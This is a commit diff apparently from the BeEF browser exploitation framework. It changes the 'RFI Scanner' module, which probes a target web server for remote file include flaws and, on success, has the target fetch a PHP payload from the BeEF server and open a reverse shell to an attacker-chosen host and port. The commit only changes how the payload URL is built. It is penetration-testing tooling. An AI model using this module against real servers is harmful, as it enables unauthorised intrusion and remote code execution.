remove payload url
This commit is contained in:
Brendan Coles
@@ -436,12 +436,11 @@ ZombieTab_Network = function(zombie) {
|
||||
var mod_id = get_module_id("rfi_scanner");
|
||||
var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
|
||||
var lport = prompt("Enter local port for connect back shell:", 'LPORT');
|
||||
var payload_url = prompt("Enter BeEF server URL:", 'http://beef_host:beef_port/');
|
||||
alert("Now start your reverse shell handler on " + lhost + ':' + lport);
|
||||
commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
|
||||
$jwterm.ajax({
|
||||
contentType: 'application/json',
|
||||
data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload_url":payload_url, "payload":"reverse_php"}),
|
||||
data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload":"reverse_php"}),
|
||||
dataType: 'json',
|
||||
type: 'POST',
|
||||
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
|
||||
|
||||
@@ -10,7 +10,7 @@ beef.execute(function() {
|
||||
var rhost = '<%= @rhost %>';
|
||||
var rport = '<%= @rport %>';
|
||||
var base_dir = '<%= @base_dir %>';
|
||||
var payload_url = '<%= @payload_url %>/rfi_php_<%= @command_id %>.txt?';
|
||||
var payload_url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/rfi_php_<%= @command_id %>.txt?';
|
||||
var target = rproto + '://' + rhost + ':' + rport + base_dir;
|
||||
var wait = '<%= @wait %>';
|
||||
|
||||
|
||||
@@ -9,7 +9,7 @@ beef:
|
||||
enable: true
|
||||
category: "Exploits"
|
||||
name: "RFI Scanner"
|
||||
description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the <a href='https://code.google.com/p/fuzzdb/'>fuzzdb</a> <a href='https://fuzzdb.googlecode.com/svn/trunk/attack-payloads/rfi/rfi.txt'>RFI list</a>. Many of these vulns require the target to have register_globals enabled in the PHP config.<br/><br/>The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below.</br><br/>This module mounts the payload on the BeEF server. Be sure to specify the BeEF server URL below for the target server to connect to."
|
||||
description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the <a href='https://code.google.com/p/fuzzdb/'>fuzzdb</a> <a href='https://fuzzdb.googlecode.com/svn/trunk/attack-payloads/rfi/rfi.txt'>RFI list</a>. Many of these vulns require the target to have register_globals enabled in the PHP config.<br/><br/>The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below."
|
||||
authors: ["bcoles"]
|
||||
target:
|
||||
working: ["ALL"]
|
||||
|
||||
@@ -149,11 +149,8 @@ EOS
|
||||
|
||||
def self.options
|
||||
configuration = BeEF::Core::Configuration.instance
|
||||
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
|
||||
beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
|
||||
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
|
||||
lhost = "" if lhost == "0.0.0.0"
|
||||
url = "#{proto}://#{lhost}:#{beef_port}"
|
||||
return [
|
||||
{ 'name' => 'rproto',
|
||||
'type' => 'combobox',
|
||||
@@ -173,7 +170,6 @@ EOS
|
||||
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
|
||||
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
|
||||
{ 'name' => 'base_dir', 'ui_label' => 'Base Directory', 'value' => '/' },
|
||||
{ 'name' => 'payload_url', 'ui_label' => 'BeEF server URL', 'value' => url },
|
||||
{ 'name' => 'payload',
|
||||
'type' => 'combobox',
|
||||
'ui_label' => 'Payload',
|
||||
|
||||
Reference in New Issue
Block a user